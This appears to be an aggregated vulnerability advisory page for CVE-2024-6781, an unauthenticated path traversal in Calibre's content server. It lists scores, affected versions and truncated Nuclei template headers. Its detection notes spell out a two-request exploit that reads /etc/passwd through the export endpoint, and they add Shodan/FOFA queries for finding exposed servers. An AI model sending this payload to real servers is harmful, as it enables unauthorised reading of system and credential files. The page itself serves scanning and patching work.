CVE-2024-6781
Published: 2024-08-06
CVE-2024-6781: Path traversal in Calibre <= 7.14.0 allows unauthenticated attackers to achieve arbitrary file read.
Priority: P277 · Severity: high · CVSS 3.1 base score: 7.5
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
Tags: EXPLOIT
EPSS: 62.70% (99.1th percentile)
Path traversal in Calibre <= 7.14.0 allows unauthenticated attackers to achieve arbitrary file read.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| calibre-ebook | calibre | <= 7.14.0 | — |
| calibre | calibre | — | — |
| calibre | calibre | >= 0 < 7.16.0+ds-1 | 7.16.0+ds-1 |
| calibre | calibre | >= 0 < 7.16.0+ds-1 | 7.16.0+ds-1 |
| debian | calibre | < calibre 7.16.0+ds-1 (forky) | calibre 7.16.0+ds-1 (forky) |
Detection & IOCs (extracted from sources)

- url: GET /interface-data/books-init HTTP/1.1
- url: POST /cdb/cmd/export HTTP/1.1
- command: ["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
- path: ../../../../../etc/passwd

Notes:

- First stage: send GET to /interface-data/books-init to extract a valid book_id from '.search_result.book_ids[0]' via JSON extraction, then use it in the exploit POST.
- Second stage: POST to /cdb/cmd/export with Content-Type: application/json and body ["extra_file", <book_id>, "../../../../../etc/passwd", ""] to trigger path traversal arbitrary file read.
- Successful exploitation returns HTTP 200 with Content-Type: application/json and a body matching both 'root:.*:0:0:' and '"result":' patterns.
- No authentication is required; the vulnerability is exploitable by unauthenticated attackers against Calibre's content server.
- Identify exposed Calibre content servers via Shodan (html:"Calibre") or FOFA (Server: calibre) for attack surface enumeration.
- The exploit requires a two-step HTTP interaction: first retrieve a valid book_id, then use it in the path traversal POST. A single-request detection will miss the dependency.
- Affected versions are Calibre <= 7.14.0; fixed in 7.15.0+ (upstream) and 7.16.0+ds-1 (Debian). Ensure version checks in scanners target this range.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | LOW | — |
OSV
CVE-2024-6781: Path traversal in Calibre <= 7
osv · 2024-08-06 · CVSS 7.5
CVE-2024-6781 [HIGH] CVE-2024-6781: Path traversal in Calibre <= 7
Path traversal in Calibre <= 7.14.0 allows unauthenticated attackers to achieve arbitrary file read.
GHSA
GHSA-p89v-3g23-m6q2: Path traversal in Calibre <= 7
ghsa_unreviewed · 2024-08-06
CVE-2024-6781 [HIGH] CWE-22 GHSA-p89v-3g23-m6q2: Path traversal in Calibre <= 7
Path traversal in Calibre <= 7.14.0 allows unauthenticated attackers to achieve arbitrary file read.
Debian
CVE-2024-6781: calibre - Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve a...
vendor_debian · 2024 · CVSS 7.5
CVE-2024-6781 [HIGH] CVE-2024-6781: calibre - Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve a...
Path traversal in Calibre <= 7.14.0 allows unauthenticated attackers to achieve arbitrary file read.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved (fixed in 7.16.0+ds-1)
sid: resolved (fixed in 7.16.0+ds-1)
trixie: resolved (fixed in 7.16.0+ds-1)
No detection rules found.
Nuclei
Calibre <= 7.14.0 Arbitrary File Read
nuclei · CVSS 7.5
CVE-2024-6781 [HIGH] Calibre <= 7.14.0 Arbitrary File Read
Calibre <= 7.14.0 Arbitrary File Read
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
Template:

```yaml
id: CVE-2024-6781

info:
  name: Calibre <= 7.14.0 Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
  impact: |
    Attackers can exploit the content server's export functionality to read arbitrary files from the system through path traversal.
  remediation: |
    Update Calibre to version 7.15.0 or later to address the arbitrary file read vulnerability.
  reference:
    - https://starlabs.sg/advisories/24/24-6781/
  classification:
    cve-id: CVE-2024-6781
    cwe-id: CWE-22
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    epss-score: 0.93721
    epss-percentile: 0.9985
    cpe: cpe:2.3:a:
```
Nuclei
Calibre <= 7.14.0 Remote Code Execution
nuclei · CVSS 9.8
CVE-2024-6782 [CRITICAL] Calibre <= 7.14.0 Remote Code Execution
Calibre <= 7.14.0 Remote Code Execution
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
Template:

```yaml
id: CVE-2024-6782

info:
  name: Calibre <= 7.14.0 Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
  impact: |
    Unauthenticated attackers can execute arbitrary Python code through the content server's template functionality, achieving complete system compromise.
  remediation: |
    Update Calibre to version 7.15.0 or later to address the remote code execution vulnerability.
  reference:
    - https://starlabs.sg/advisories/24/24-6781/
  classification:
    cve-id: CVE-2024-6782
    cwe-id: CWE-863
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-
```
No writeups or analysis indexed.

Published: 2024-08-06